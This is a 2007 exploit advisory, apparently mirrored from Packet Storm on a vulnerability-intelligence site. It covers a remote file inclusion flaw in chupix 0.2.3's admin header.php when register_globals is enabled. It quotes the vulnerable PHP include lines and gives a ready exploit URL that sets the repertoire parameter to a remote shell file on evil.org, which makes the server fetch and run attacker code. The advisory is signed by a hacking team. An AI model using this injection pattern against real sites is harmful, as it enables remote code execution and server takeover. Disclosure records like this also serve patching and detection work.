Lucene search

chupix-rfi.txt

🗓️ 28 Sep 2007 00:00:00Reported by 0inType

packetstorm🔗 packetstormsecurity.com👁 15 Views

chupix 0.2.3 /admin/include/header.php RFI found by 0in and exploited through register_globals=O

`#chupix 0.2.3 /admin/include/header.php RFI  
#f0und by 0in  
#contact: [email protected]  
#Greetings to:Die-angel,Slim,Joker186,Kaja,Artysta,wojto111,reydex  
#team:Our Dark-Coders team;]  
--------------------------------------------------------------------------------------------------------------------  
#register_globals=On  
BUG:  
include($repertoire .'db/config/config.php'); // lecture de la configuration souhaitée par l'utilisateur  
include($repertoire .'include/template.php'); // classe de création des templates  
include($repertoire .'include/MyTxt.php'); // inclusion de la classe MyTxt  
$path_lang = $repertoire ."langues/". $conf__lang ."/admin.php";  
include($path_lang); // Chargement du fichier de langues  
  
EXPLOIT:  
http://x.com/[patch]/admin/include/header.php?repertoire=http://evil.org/shell.txt ?  
--------------------------------------------------------------------------------------------------------------------  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

28 Sep 2007 00:00Current

7.4High risk

Vulners AI Score7.4

chupix rfi 0in register_globals 0.2.3 exploit include template dark-coders configuration path_lang